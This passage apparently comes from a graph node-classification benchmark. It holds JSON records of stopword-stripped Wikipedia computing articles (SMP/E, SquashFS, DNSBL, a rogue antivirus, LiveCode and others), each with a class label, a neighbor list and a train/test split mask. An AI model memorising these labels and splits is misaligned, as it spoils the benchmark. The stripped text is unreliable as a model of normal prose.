    "text": "SMP/E:smp/e smp/e system modification program/extended tool designed manage installation software products z/os system track modifications products smp/e manages multiple software versions helps apply patches updates ptfs facilitates orderly testing necessary reversion previous state allows trial run pseudo-installation verify actual installation work keeps audit security records assure approved software updates occur otherwise provides highly evolved centralized control software installation z/os although possible design ship software products install z/os without smp/e mainframe administrators prefer smp/e-enabled products least non-trivial packages using smp/e typically requires working knowledge job control language jcl although products supply sample jcl rigorous software management discipline associated smp/e typically extends product documentation well ibm vendors supplying standardized program directory manual software product precisely aligns smp/e work processes program directory provides detailed information pre-requisites co-requisites example use smp/e manage system updates helps ensure system integrity making sure system consistent state changes state properly audited previously called smp system modification program smp/e evolved osmp os maintenance program os/360 smp version 4 major revision new syntax smp/e introduced mvs introduced use vsam datasets concept extended ibm operating systems dos/vs maintain system history program mshp vm/sp ses virtual machine serviceability enhancements staged vmses/e ibm non-ibm software assigned least one seven character fmid function module id identifies piece software release number first fmid called base fmid example db2 version 9 base fmid hdb9910 separately installable features also fmids called dependent fmids relate way base product db2 english language panels version 9 dependent fmid jdb9910 software package composed elements individual components object files mod macros mac sample programs samp etc csi consolidated software inventory dataset containing information smp/e needs track contents distribution target libraries csi contains metadata identifying installed fmids elements id recent update pointers associated libraries sysmod system modification modification system includes sysmod assigned seven character sysmod id uniquely identify sysmod installed id recorded csi entry element added replaced called rmid replacement module id simple declarative language called mcs modification control statements provides information smp/e identifying sysmod providing information install sysmod prefixed number mcs statements example identify apar fix ptf supply sysmod id identify applicable fmid etc prerequisites prereqs sysmods required installed second installed corequisites coreqs two sysmods must installed together none installed without others sysmod supersedes sups another functionally replaces first prereq coreq sup information provided mcs requisite chain sequence sysmods directly indirectly identified requisites given sysmod example prereq b b prereq c b requisite chain c need installed c although necessarily separate run smp/e requisite chains frequently become extremely involved comprise hundreds sysmods holddata set mcs statements indicate specific sysmods contain errors require manual processing outside scope smp/e installed user required take action fix problem possible installing held sysmods smp/e manages two types libraries target libraries tlibs contain executable code information used run system originally limited number target libraries sys1.linklib executable programs sys1.maclib standard macros etc. 2012 software product usually set target libraries distribution libraries dlibs contain master copy element system product fmid set distribution libraries normally used smp/e libraries os/360 successors unlike directories unix usually contain one type format data software package may object libraries mod ispf panels pnl macro libraries mac many smp/e single large program runs batch job series ispf panels used interactively build smp/e job stream based user input one common sequence steps called receive-apply-accept commands used step smp/e receive command processes sysmods source outside smp previously might put tape distributed ibm roughly monthly recently might collection sysmods downloaded internet receive process uses mcs create entry csi sysmod marking status received stores mcs information actual sysmod data reject command used delete sysmods received status apply command installs one received sysmods appropriate target libraries sysmods applied selected various criteria example single sysmod selected sysmod id sysmods received group selected sourceid un-applied sysmods received applied requisite chains specified sysmods checked sysmods without proper requisites hold status superseded flagged errors installed commonly smp/e instructed also automatically apply requisites receive status minimize errors sysmods installed status changed applied csi apply check used check sysmods installed without actually performing installation restore command used remove applied sysmod accepted accept command installs sysmods permanently distribution libraries marks status accepted csi normally accept done sysmods known performing correctly next apply service way smp/e undo accept operation except delete installation libraries including csis start installation smp/e large complex program features datasets added every release major smp/e datasets",
    "neighbors": [
      10760,
      6680,
      9245,
      5155,
      5670,
      7722,
      5677,
      7217,
      10817,
      3667,
      6227,
      9324,
      1138,
      2168,
      7293,
      6797,
      10900,
      10394,
      4775,
      6828,
      6325,
      5819,
      190,
      1219,
      4302,
      1235,
      2259,
      6361,
      8413,
      741,
      231,
      2281,
      9977,
      6393,
      11525,
      7435,
      7947,
      9487,
      788,
      1813,
      5397,
      8476,
      6446,
      1842,
      823,
      2872,
      3386,
      3918,
      4951,
      9564,
      2401,
      1379,
      868,
      9063,
      8554,
      10096,
      5492,
      8068,
      3462,
      8582,
      2955,
      909,
      7053,
      11184,
      6583,
      10172,
      9151,
      8644,
      9671,
      5578,
      5067,
      5070,
      463,
      2010,
      7140,
      6119,
      5096,
      5612,
      1522,
      3573
    ],
    "mask": "Test"
  },
  {
    "node_id": 8214,
    "label": 6,
    "text": "SquashFS:squashfs squashfs compressed read-only file system linux squashfs compresses files inodes directories supports block sizes 4 kib 1 mib greater compression several compression algorithms supported squashfs also name free software licensed gpl accessing squashfs filesystems squashfs intended general read-only file-system use constrained block-device memory systems e.g embedded systems low overhead needed squashfs used live cd versions arch linux debian fedora gentoo linux linux mint salix ubuntu embedded distributions openwrt dd-wrt router firmware also used chromecast system partitions android nougat often combined union mount filesystem unionfs overlayfs aufs provide read-write environment live linux distributions takes advantage squashfs high-speed compression abilities ability alter distribution running live cd distributions debian live mandriva one puppy linux salix live slax use combination appimage project aims create portable linux applications uses squashfs creating appimages snappy package manager also uses squashfs .snap file format squashfs also used linux terminal server project splashtop tools unsquashfs mksquashfs ported windows nt – windows 8.1 7-zip also supports squashfs squashfs initially maintained out-of-tree linux patch initial version 1.0 released 23 october 2002 2009 squashfs merged linux mainline part linux 2.6.29 process backward-compatibility code older formats removed since squashfs kernel space code maintained linux mainline tree user space tools remain project sourceforge page original version squashfs used gzip compression although linux kernel 2.6.34 added support lzma lzo compression linux kernel 2.6.38 added support lzma2 compression used xz linux kernel 3.19 added support lz4 compression support zstandard added linux kernel 4.14 linux kernel 2.6.35 added support extended file attributes",
    "neighbors": [
      5120,
      2564,
      6669,
      3598,
      2064,
      10257,
      9236,
      6677,
      5142,
      10774,
      3611,
      9244,
      9249,
      9762,
      5158,
      7225,
      11323,
      8772,
      1109,
      4708,
      8298,
      9836,
      7789,
      9333,
      6263,
      9335,
      1150,
      9343,
      8837,
      7818,
      654,
      2193,
      2194,
      2197,
      2199,
      11419,
      6309,
      1190,
      5286,
      10405,
      5293,
      7344,
      2230,
      5816,
      1212,
      8380,
      3265,
      10951,
      9420,
      6352,
      7378,
      3795,
      4819,
      8402,
      8404,
      10451,
      728,
      8410,
      6365,
      9953,
      10977,
      739,
      7907,
      4841,
      8938,
      10476,
      1263,
      3312,
      3826,
      2291,
      246,
      6393,
      3834,
      3328,
      11012,
      2314,
      8461,
      6416,
      8976,
      1810,
      6935,
      11033,
      287,
      10016,
      1825,
      6434,
      5413,
      3368,
      4907,
      9004,
      302,
      7983,
      6961,
      6963,
      1844,
      823,
      6970,
      11072,
      3909,
      2378,
      4431,
      5969,
      346,
      2395,
      2397,
      8033,
      10596,
      2407,
      10087,
      11638,
      6519,
      376,
      11128,
      890,
      1406,
      2432,
      7554,
      8075,
      7565,
      6545,
      5013,
      11675,
      11676,
      414,
      2974,
      7070,
      10151,
      4012,
      1454,
      6062,
      8114,
      7603,
      8631,
      1464,
      1978,
      8643,
      4561,
      7126,
      2015,
      7140,
      1509,
      8676,
      9189,
      7663,
      11256,
      2555,
      3582
    ],
    "mask": "None"
  },
  {
    "node_id": 8215,
    "label": 4,
    "text": "Your_PC_Protector:pc protector pc protector rogue antivirus program part windows police pro windows antivirus pro family program tries block type microsoft program anti-virus anti-malware suite program says protect computer program protect use firewall data like malware pc protector tries steal privacy asking credit card data use money much says spend anti-malware like malwarebytes antimalware might able remove virus pc protector uses windows filenames hide program name way track extra svchost.exe running user profile task manager processes may find svchost.exe common files may open pc protector would hijack windows registry modify web browser loading feature hijack registry make web page load saying unsafe web page show virus alert alert claims must purchase pc protector program also install browser helper object would hijack search results feature modifies windows host file dns hijacker dns hijacking pc protector secure purchase pc protector many different actions pc protector many different blocked executable .exe files pc protector blocks computer user using",
    "neighbors": [
      7515,
      9287,
      8959
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8216,
    "label": 0,
    "text": "Name_resolution_(semantics_and_text_extraction):name resolution semantics text extraction semantics text extraction name resolution refers ability text mining software determine actual person actor object particular use name refers also referred entity resolution example text mining field software frequently needs interpret following text john gave edward book stood called john come back room sentences software must determine whether pronoun refers john edward first sentence software must also determine whether john referred second sentence john first sentence third person whose name also happens john examples apply almost languages english frequently type name resolution also used across documents example determine whether george bush referenced old newspaper article president united states george h. w. bush person george bush mentioned separate news article years later man running president george w bush many people may name analysts software must take account substantially information name determine whether two identical references george bush actually refer specific entity person name/entity resolution text extraction semantics notoriously difficult problem part many cases sufficient information make accurate determination numerous partial solutions exist rely specific contextual clues found data currently known general solution problem sometimes referred name disambiguation digital libraries author disambiguation examples software might provide name resolution benefits see also",
    "neighbors": [
      8440,
      2059,
      5571
    ],
    "mask": "None"
  },
  {
    "node_id": 8217,
    "label": 1,
    "text": "Apache_Phoenix:apache phoenix apache phoenix open source massively parallel relational database engine supporting oltp hadoop using apache hbase backing store phoenix provides jdbc driver hides intricacies nosql store enabling users create delete alter sql tables views indexes sequences insert delete rows singly bulk query data sql phoenix compiles queries statements native nosql store apis rather using mapreduce enabling building low latency applications top nosql stores phoenix began internal project company salesforce.com need support higher level well understood sql language originally open-sourced github 28 jan 2014 became top-level apache project 22 may 2014 apache phoenix included hortonworks distribution hdp 2.1 available part cloudera labs part hadoop ecosystem",
    "neighbors": [
      9344,
      10377,
      8460,
      7567,
      1296,
      6161,
      1047,
      1816,
      11161,
      6555,
      8860,
      6943,
      3877,
      10661,
      11303,
      5677,
      10413,
      1327,
      7983,
      4919,
      5047,
      4538,
      1851,
      6074,
      7485,
      7742,
      9789,
      7233,
      6338,
      4419,
      1222,
      1991,
      4294,
      7750,
      5066,
      8139,
      9286,
      11343,
      4944,
      1363,
      5332,
      11221,
      8408,
      9179,
      7261,
      990,
      8799,
      10719,
      865,
      11235,
      8294,
      11111,
      8425,
      8810,
      747,
      5612,
      2413,
      7022,
      10090,
      2163,
      6774,
      7159,
      1913,
      1018
    ],
    "mask": "Test"
  },
  {
    "node_id": 8218,
    "label": 0,
    "text": "Verbmobil:verbmobil verbmobil long-term interdisciplinary language technology esp machine translation research project aim develop system recognize translate produce natural utterances thus translate spontaneous speech robustly bidirectionally german/english german/japanese verbmobil research carried 1993 2000 funded germany federal ministry research technology bundesministerium für forschung und technologie total 116m deutschmarks roughly 60m euros industry partners daimlerchrysler siemens philips contributed additional 52 million dm 26m euros verbmobil ii project tübingen university created semi-automatically annotated treebanks german japanese english spontaneous speech tüba-d/s contains ca 38,000 sentences 360,000 words tüba-e/s contains ca 30,000 sentences 310,000 words tüba-j/s contains ca 18,000 sentences 160,000 words",
    "neighbors": [
      10610
    ],
    "mask": "Test"
  },
  {
    "node_id": 8219,
    "label": 9,
    "text": "Active_Oberon:active oberon active oberon general purpose programming language developed 1996-1998 group around niklaus wirth jürg gutknecht swiss federal institute technology eth zürich extension programming language oberon extensions aim implementing active objects expressions parallelism compared predecessors oberon oberon-2 active oberon adds objects object-centered access protection local activity control system-guarded assertions preemptive priority scheduling changed syntax methods aka type-bound procedures oberon terminology objects may active means may threads processes operating system a2 aka bluebottle especially kernel synchronizes coordinates different active objects unlike java c objects may synchronized signals directly conditions simplifies development concurrent programs fork active oberon zonnon",
    "neighbors": [
      6979,
      8262,
      4423,
      5677,
      11102,
      8082,
      9107,
      6558,
      7775
    ],
    "mask": "Test"
  },
  {
    "node_id": 8220,
    "label": 3,
    "text": "CHAIN_(industry_standard):chain industry standard ceced convergence working group defined new platform called chain ceced home appliances interoperating network defines protocol interconnecting different home appliances single multibrand system allows control automation basic appliance-related services home e.g. remote control appliance operation energy load management remote diagnostics automatic maintenance support appliances downloading updating data programs services possibly internet",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 8221,
    "label": 9,
    "text": "Name_resolution_(programming_languages):name resolution programming languages programming languages name resolution resolution tokens within program expressions intended program components expressions computer programs reference variables data types functions classes objects libraries packages entities name context name resolution refers association not-necessarily-unique names intended program entities algorithms determine identifiers refer specific contexts part language definition complexity algorithms influenced sophistication language example name resolution assembly language usually involves single simple table lookup name resolution c++ extremely complicated involves programming languages name resolution performed either compile time runtime former called static name resolution latter called dynamic name resolution somewhat common misconception dynamic typing implies dynamic name resolution however static typing imply static name resolution example erlang dynamically typed static name resolution static name resolution catches compile time use variables scope preventing programmer errors languages dynamic scope resolution sacrifice safety flexibility typically set get variables scope runtime example python interactive repl however relying dynamic name resolution code discouraged python community feature also may removed later version python examples languages use static name resolution include c c++ e erlang haskell java pascal scheme smalltalk examples languages use dynamic name resolution include lisp dialects perl php python rebol tcl masking occurs identifier used different entities overlapping lexical scopes level variables rather names known variable shadowing identifier variable x masks identifier variable x two conditions met outer variable x said shadowed inner variable x example parameter foo shadows local variable foo common pattern name masking cause complications function overloading due overloading happening across scopes languages notably c++ thus requiring overloaded functions redeclared explicitly imported given namespace programming languages lexical scoping reflect variable names α-conversion α-renaming used make name resolution easy finding substitution makes sure variable name masks another name containing scope alpha-renaming make static code analysis easier since alpha renamer needs understand language scoping rules example code within point constructor class variables x shadowed local variables name might alpha-renamed new version masking immediately obvious uses correspond declarations",
    "neighbors": [
      256,
      386,
      8582,
      10510,
      655,
      9871,
      10011,
      10013,
      545,
      3876,
      7847,
      5677,
      692,
      8644,
      8262,
      7627,
      8524,
      477,
      3554,
      10083,
      6502,
      8041,
      8554,
      9454,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 8222,
    "label": 3,
    "text": "Macintosh_Quadra_840AV:macintosh quadra 840av macintosh quadra 840av personal computer designed manufactured sold apple computer inc. july 1993 july 1994 introduced alongside centris 660av av model numbers signifying video input output capabilities well enhanced audio 840av mini tower form factor quadra 800 faster motorola 68040 processor quadra 840av discontinued shortly introduction powerpc-based power macintosh power macintosh 8100/80av provided functionality form factor albeit significantly higher price point 7100/66av priced comparably 840av iivx-style desktop case time introduction 40 mhz motorola 68040 cpu interleaved ram made fastest macintosh available topping nominally higher-end quadra 950 quadra 800 7 mhz remains fastest quadra fastest 68k macintosh time since later high-end macintoshes powerpc-based power macintoshes 840av also mac use 40 mhz-clocked 68040 also sports faster 66.7 mhz dsp 3210 digital signal processor chip compared 55 mhz variant 660av on-board dsp primarily intended speed audio/video processing although mac programs made use due complexity programming 840av relative centris/quadra 660av marked number firsts macintosh family first macintoshes include on-board 16-bit 48 khz stereo audio playback recording capability well s-video composite video input output improve video playback two separate frame buffers used one standard graphics one specifically video enabled live video input displayed scalable window within macintosh user interface also first personal computers supported speech recognition plaintalk out-of-the-box apple geoport telecom adapter kit introduced av macs added many dsp-based telecommunication functions modem fax telephony quadra 840av came similar case earlier macintosh quadra 800 housing chassis power supply internal storage assemblies front rear panels changed power button moved back internally 840av significantly different apart faster processor logic board lacks 800 processor direct slot second adb port dav slot line nubus slot new geoport also unlike 800 8 mib fixed ram 840av memory simms reason minimum amount memory lower way 840av deals memory dram different machines generation quadra 700 800 950 4 8 16 32 mb 72-pin 60ns simms may installed 128 mb sizes mixed however quadra 840av support 1 mb 2 mb 64 mb simms 840av 660av first macintosh computers operate 32-bit mode times toggled back 24-bit mode may useful using early nubus cards conform 24-bit addressing new av machines first ship standard internal cd-rom drive earlier quadra centris models available built-in cd-rom drive optional extras operating system installation package came cd-rom rather series floppy disks whenever cd-rom drive included hidden quicktime video included original quadra 840av/centris 660av install first cd-rom shows jubilant cyclone tempest design team midst celebrating accomplishment video cyclone 840av prototype logic board shown logic board fitted 25 mhz 68040 number rework wires conspicuously daughter card nicknamed karma audio video input/output ports located notably audio video ports card front-facing positioned though would protrude opening lower front case easily accessible user according member team av card feature omitted enough room case coinciding introduction av macs apple introduced apple audiovision 14 display featuring easily accessible audio input audio output video input ports could fed adc adapter cable connected rear av ports av macs later power macintosh 6100 7100 8100 returned av card concept later abandoned 7500/8500 series machines re-introduced wings av personality card power macintosh g3 gossamer artemis machines stored inside spare rom space two jpeg images quadra 840av development team early quadra 840av logic boards featured 2 mb rom simm slot located ram simm slots originally planned 840av rom would contain bootable image system 7 within larger 4 mb rom space code-named supermario apple dropped idea 840av shipped later revisions 840av logic board included 2 mb rom soldered onto logic board",
    "neighbors": [
      7697,
      4114,
      6165,
      11289,
      7706,
      1057,
      6183,
      1576,
      4139,
      7211,
      8253,
      1090,
      4180,
      10838,
      10840,
      3167,
      9312,
      8806,
      6258,
      10357,
      4220,
      10365,
      10878,
      6783,
      4741,
      7305,
      8842,
      6283,
      7824,
      147,
      7830,
      6807,
      4258,
      7842,
      7844,
      3241,
      6314,
      7869,
      8893,
      8896,
      4807,
      4810,
      1744,
      3293,
      9952,
      6884,
      6377,
      1772,
      1776,
      10481,
      1290,
      781,
      4879,
      784,
      8480,
      10023,
      4910,
      7983,
      11066,
      9022,
      10562,
      8525,
      2388,
      8534,
      3928,
      8540,
      6495,
      8544,
      11629,
      10608,
      9084,
      7549,
      11649,
      3977,
      6539,
      5520,
      1428,
      3483,
      2979,
      8109,
      446,
      5058,
      10691,
      1482,
      6608,
      8662,
      9174,
      10199,
      8665,
      9182,
      2023,
      5616,
      6130,
      2551,
      2553,
      8700,
      1534
    ],
    "mask": "Train"
  },
  {
    "node_id": 8223,
    "label": 3,
    "text": "The_Flintstones_(1988_video_game):flintstones 1988 video game flintstones 1988 video game based 1960s television series flintstones game developed teque software development published grandslam entertainments game released europe 1988 amiga amstrad cpc atari st commodore 64 msx2 zx spectrum version sega master system released 1991 version flintstones features identical gameplay game contains four levels story begins fred flintstone finishing work rock quarry exclaiming yabba dabba doo game spoken line dialogue achieved speech synthesis remainder game character interactions done speech balloons fred wants bowl barney rubble bowling alley fred wife wilma tells must paint living room first arrival mother playing fred player must paint room also preventing young daughter pebbles scribbling walls player paintbrush squirrel stopping pebbles squirrel sometimes runs away must captured second level fred must race bowling alley avoiding rocks road hitting rock results vehicle losing wheel requiring player search replacement get back road third level played bowling game fred barney two players taking turns final level fred returns home discovers pebbles missing house finds climbing construction site competes barney rescue avoiding nuts bolts practice mode allows player explore area rendition theme music television series created ben daglish present throughout game except zx spectrum version games machine criticized bowling level long-winded restacking pins bowl – taking realism far magazine praised music noted graphics could challenge tv cartoon concluded patience flintstones could provide amusing generally tough challenge magazine noted atari st version identical amiga version except slightly poorer sound reviewing amstrad cpc commodore 64 zx spectrum versions games machine wrote version retained impressive cartoon-like graphics difficult gameplay earlier versions magazine wrote commodore version moves fair rate spectrum amstrad cpc versions slow enough cause frustration chris jenkins computer video games praised graphics sound considered bowling level poorest portion game jenkins concluded game polished professional product deserves seen john butters atari st user praised music sound called graphics immaculate concluded game soon became frustrating rather addictive andy richards also atari st user praised music sound gameplay graphics one reviewer st action wrote painting level clever infuriating taxing bowling scene could thoughtfully designed another reviewer st action wrote sluggish controls slow speed make painting scene unbelievably tedious sadly bowling scene anything worse lot time wasted player resets pins whilst barney bowls means sitting waiting turn nothing program recommend paul glancey zzap 64 wrote commodore 64 version poor sprites feeble backgrounds coupled grating rendition flintstones theme tune create bad impression frustrating controls painting section enthrall sub-games dated – paint collect game '88 – basic tenth frame bowling n't encourage player reach final section tv licences work rarely flintstones certainly n't paul sumner also zzap 64 wrote neither fred barney resembled television counterparts praised sound music sumner wrote gameplay little difficult first due mainly slightly unresponsive control perseverance reap reward though personally found game difficult warrant extensive play",
    "neighbors": [
      10931,
      3533,
      9006
    ],
    "mask": "None"
  },
  {
    "node_id": 8224,
    "label": 4,
    "text": "DNSBL:dnsbl domain name system-based blackhole list dnsbl real-time blackhole list rbl effort stop email spamming blacklist locations internet reputed send email spam locations consist ip addresses often used publish addresses computers networks linked spamming mail server software configured reject flag messages sent site listed one lists term blackhole list sometimes interchanged term blacklist blocklist dnsbl software mechanism rather specific list policy dozens dnsbls existence use wide array criteria listing delisting addresses may include listing addresses zombie computers machines used send spam internet service providers isps willingly host spammers sent spam honeypot system since creation first dnsbl 1998 operation policies lists frequently controversial internet advocacy occasionally lawsuits many email systems operators users consider dnsbls valuable tool share information sources spam others including prominent internet activists objected form censorship addition small number dnsbl operators target lawsuits filed spammers seeking lists shut first dnsbl real-time blackhole list rbl created 1997 first border gateway protocol bgp feed paul vixie dnsbl eric ziegast part vixie mail abuse prevention system maps dave rand abovenet first subscriber first version rbl published dnsbl rather list networks transmitted via bgp routers owned subscribers network operators could drop tcp/ip traffic machines used send spam host spam supporting services website inventor technique later commonly called dnsbl eric ziegast employed vixie enterprises term blackhole refers networking black hole expression link network drops incoming traffic instead forwarding normally intent rbl sites using would refuse traffic sites supported spam — whether actively sending spam ways address would listed rbl volunteers maps staff would attempt repeatedly contact persons responsible get problems corrected effort considered important blackholing network traffic also meant spammers spam supporting isps could delay put rbl long periods discussions went later rbl also released dnsbl form paul vixie encouraged authors sendmail mail software implement rbl support clients allowed mail software query rbl reject mail listed sites per-mail-server basis instead blackholing traffic soon advent rbl others started developing lists different policies one first alan brown open relay behavior-modification system orbs used automated testing discover list mail servers running open mail relays—exploitable spammers carry spam orbs controversial time many people felt running open relay acceptable scanning internet open mail servers could abusive 2003 number dnsbls came denial-of-service attacks dos since party admitted attacks discovered responsible purpose matter speculation however many observers believe attacks perpetrated spammers order interfere dnsbls operation hound shutting august 2003 firm osirusoft operator several dnsbls including one based spews data set shut lists suffering weeks near-continuous attack technical specifications dnsbls came relatively late rfc5782 uniform resource identifier uri dnsbl dnsbl lists domain names sometimes also ip addresses found clickable links contained body spams generally found inside legitimate messages uri dnsbls created determined much spam made past spam filters short time frame first use spam-sending ip address point sending ip address first listed major sending-ip-based dnsbls many cases elusive spams contain links domain names ip addresses collectively referred uris uri already spotted previously caught spam uri found non-spam e-mail therefore spam filter extracts uris message checks uri dnsbl spam blocked even sending ip spam yet listed sending ip dnsbl three major uri dnsbls oldest popular surbl surbl created volunteers surbl started second major uri dnsbl uribl 2008 another long-time surbl volunteer started another uri dnsbl ivmuri spamhaus project provides spamhaus domain block list dbl describe domains found spam messages dbl intended uribl rhsbl checked domains message envelope headers domains urls message bodies unlike uribls dbl lists domain names ip addresses since spamhaus provides lists ip addresses uri dnsbls often confused rhsbls right hand side bls different uri dnsbl lists domain names ips found body message rhsbl lists domain names used reply-to e-mail address rhsbls debatable effectiveness since many spams either use forged addresses use addresses containing popular freemail domain names gmail.com yahoo.com hotmail.com uri dnsbls widely used rhsbls effective used majority spam filters operate dnsbl requires three things domain host nameserver domain list addresses publish possible serve dnsbl using general-purpose dns server software however typically inefficient zones containing large numbers addresses particularly dnsbls list entire classless inter-domain routing netblocks large resource consumption using software designed role domain name server role-specific software applications designed specifically servers role dns blacklist hard part operating dnsbl populating addresses dnsbls intended public use usually specific published policies listing means must operated accordingly attain sustain public confidence mail server receives connection client wishes check client dnsbl let say dnsbl.example.net less following looking address dnsbl thus similar looking reverse-dns differences dnsbl lookup uses rather ptr record type uses forward domain dnsbl.example.net rather special reverse domain in-addr.arpa informal protocol addresses returned dnsbl queries match dnsbls return address 127.0.0.0/8 ip loopback network address 127.0.0.2 indicates generic listing addresses block may indicate something specific listing—that indicates open relay proxy spammer-owned host etc details see rfc 5782 uri dnsbl query rhsbl query fairly straightforward domain name query prepended dns list host follows dnslist.example.com dns list host example.net queried domain generally record returned name listed different dnsbls different policies dnsbl policies differ one another three fronts addition different types listed entities ip addresses traditional dnsbls host domain names rhsbls uris uribls wide range semantic variations lists listing means list maintainers divided issues whether listings seen statements objective fact subjective opinion lists best used result definitive taxonomy dnsbls names defined e.g yellow nobl varieties widespread use names widespread use recognized many spam control specialists end-users organizations concerns regarding concept dnsbls specifics created used criticisms include despite criticisms people object principle mail-receiving sites able reject undesired mail systematically one person john gilmore deliberately operates open mail relay gilmore accuses dnsbl operators violating antitrust law number parties electronic frontier foundation peacefire raised concerns use dnsbls isps one joint statement issued group including eff peacefire addressed stealth blocking isps use dnsbls spam-blocking techniques without informing clients spammers pursued lawsuits dnsbl operators similar grounds",
    "neighbors": [
      1667,
      8202,
      7949,
      914,
      3731,
      5012,
      8341,
      10263,
      8093,
      5407,
      5536,
      10275,
      2085,
      9256,
      8747,
      4272,
      8373,
      182,
      9909,
      827,
      3645,
      1472,
      10434,
      11461,
      4294,
      4295,
      10696,
      3145,
      3018,
      5835,
      5199,
      10578,
      7764,
      1495,
      3032,
      5591,
      9053,
      2527,
      9824,
      6757,
      2409,
      6762,
      1899,
      9588,
      4725,
      8054,
      761,
      1658,
      4349
    ],
    "mask": "Test"
  },
  {
    "node_id": 8225,
    "label": 9,
    "text": "LiveCode:livecode livecode formerly revolution metacard cross-platform rapid application development runtime environment inspired hypercard features transcript formerly metatalk programming language belongs family xtalk scripting languages like hypercard hypertalk environment introduced 2001 revolution development system based metacard engine technology runtime revolution later acquired metacard corporation 2003 platform macworld annual editor choice award best development software 2004 revolution renamed livecode fall 2010 livecode developed sold runtime revolution ltd. based edinburgh scotland march 2015 company renamed livecode ltd. unify company name product april 2013 free/open source version 'livecode community edition 6.0 published successful crowdfunding campaign kickstarter code base re-licensed made available free open source software version april 2013 livecode runs ios android os x windows 95 windows 10 raspberry pi several variations unix including linux solaris bsd used mobile desktop server/cgi applications ios iphone ipad version released december 2010 first version deploy web released 2009 widely used hypercard/hypertalk clone one runs major operating systems developer release v.8 announced new york march 12 2015 major enhancement product includes new separate development language known livecode builder capable creating new object classes called widgets earlier versions set object classes fixed could enhanced via use ordinary procedural languages c. new language runs ide departure transitional x-talk paradigm permits typing variables two environments fully integrated apart ability create new objects development livecode proceeds normal way within established ide second crowdfunding campaign bring html5 livecode reached funding goals nearly 400,000 usd july 31 2014 livecode developer release 8.0 dp4 august 31 2015 first include standalone deployment option html5 livecode software creates applications run many supported environments using compile-free workflow computer code livecode play across multiple devices platforms livecode uses high level english-like programming language called transcript dynamically typed transcript compile-free workflow generates code self-documenting easy casual programmers comprehend example following script executed system clock 9:00:00 ten lines loaded first text field denoted field 1 seen notes livecode natural english-like syntax easy beginners learn variables typeless typed compile time based purely context makes language simple read maintain relatively minimal loss speed language contains advanced features including associative arrays regular expressions multimedia support variety sql databases tcp/ip libraries livecode engine supports several common image formats including bmp png gif jpeg anti-aliased vector graphics html-style text hyperlinks chained behaviors embedded web browsers accessing higher-level functions designed straightforward livecode around 1,900 built-in language terms keywords may extended external libraries written c lower level languages livecode project files binary-compatible across platforms inherit platform look-and-feel behaviors buttons scroll bars progress bars menus behave expected target platform without intervention part one authoring livecode application compiling livecode standalone produces single executable file minimum size ~1.5mb platform targeted separate runtime necessary wikipedia article hypercard contains detailed discussion basics similar development environment scripting language modern livecode vast superset former hypercard yet retains simplicity livecode includes number features missing original hypercard program including multiple platform deployment communication external devices many fundamental language extensions livecode toolkit compared hypercard ability access internet-based text media resources allows creation internet-enabled desktop applications ios android targets available versions note complete linux requirements 4.5.x-6.x following",
    "neighbors": [
      9185,
      9345,
      4486,
      8262,
      4042,
      5546,
      4844,
      5612,
      6797,
      7983,
      6160,
      10413,
      11219,
      5492,
      5588,
      11221,
      823,
      1849
    ],
    "mask": "None"
  },
  {
    "node_id": 8226,
    "label": 9,
    "text": "LFE_(programming_language):lfe programming language lisp flavored erlang lfe functional concurrent garbage collected general-purpose programming language lisp dialect built core erlang erlang virtual machine beam lfe builds erlang provide lisp syntax writing distributed fault-tolerant soft real-time non-stop applications lfe also extends erlang support metaprogramming lisp macros improved developer experience feature-rich read–eval–print loop repl lfe actively supported recent releases erlang oldest version erlang supported r14 initial work lfe began 2007 robert virding started creating prototype lisp running erlang work focused primarily parsing exploring implementation might look like version control system used time tracking exact initial dates somewhat problematic virding announced first release lfe erlang questions mail list march 2008 release lfe limited handle recursive codice_1s codice_2s codice_3 codice_4 also support lisp shell initial development lfe done version r12b-0 erlang dell xps laptop robert virding stated several reasons started lfe programming language like lisp lfe expression-oriented language unlike non-homoiconic programming languages lisps make little syntactic distinction expressions statements code data written expressions lfe brought homoiconicity erlang vm lfe list data type written elements separated whitespace surrounded parentheses example list whose elements integers atom values implicitly typed respectively two integers lisp-specific data type called symbolic atom need declared seen example lfe expressions written lists using prefix notation first element list name form i.e. function operator macro remainder list arguments lfe-erlang operators used way expression evaluates 42 unlike functions erlang lfe arithmetic operators lisp variadic n-ary able take number arguments lfe lambda like common lisp also however lambda-match account erlang pattern-matching abilities anonymous function calls section represent complete comparison erlang lfe give taste erlang lfe erlang lfe idiomatic functional style erlang lfe erlang lfe using cons literal instead constructor form erlang lfe erlang lfe calls erlang functions take form module function arg1 ... argn using recursion define ackermann function defun ackermann composing functions message-passing erlang light-weight processes defmodule messenger-back multiple simultaneous http requests",
    "neighbors": [
      10752,
      11269,
      2056,
      9224,
      2062,
      9231,
      7184,
      2577,
      9749,
      8728,
      4633,
      4122,
      5677,
      3119,
      9780,
      2105,
      3132,
      6717,
      8258,
      8771,
      8262,
      1613,
      9299,
      10841,
      3675,
      7267,
      2660,
      8293,
      2666,
      5751,
      7805,
      9345,
      1159,
      9865,
      9877,
      5803,
      2225,
      6840,
      7867,
      4799,
      7880,
      8908,
      205,
      5837,
      4817,
      5852,
      10463,
      7392,
      7904,
      11488,
      11495,
      5356,
      4846,
      8430,
      5360,
      5361,
      9969,
      8435,
      9975,
      6906,
      2304,
      4865,
      4867,
      5380,
      3334,
      6919,
      3336,
      1301,
      791,
      10012,
      3869,
      2335,
      2849,
      7981,
      7983,
      2352,
      10547,
      311,
      6969,
      10571,
      3408,
      6994,
      1365,
      2392,
      10083,
      6502,
      11625,
      3446,
      10104,
      377,
      4992,
      7562,
      6556,
      6047,
      1952,
      4516,
      5031,
      1448,
      5033,
      9128,
      7612,
      7616,
      5569,
      6594,
      10690,
      4550,
      7627,
      9677,
      11218,
      11221,
      10712,
      3034,
      3051,
      5611,
      5612,
      7670,
      11255,
      2557
    ],
    "mask": "Test"
  },
  {
    "node_id": 8227,
    "label": 8,
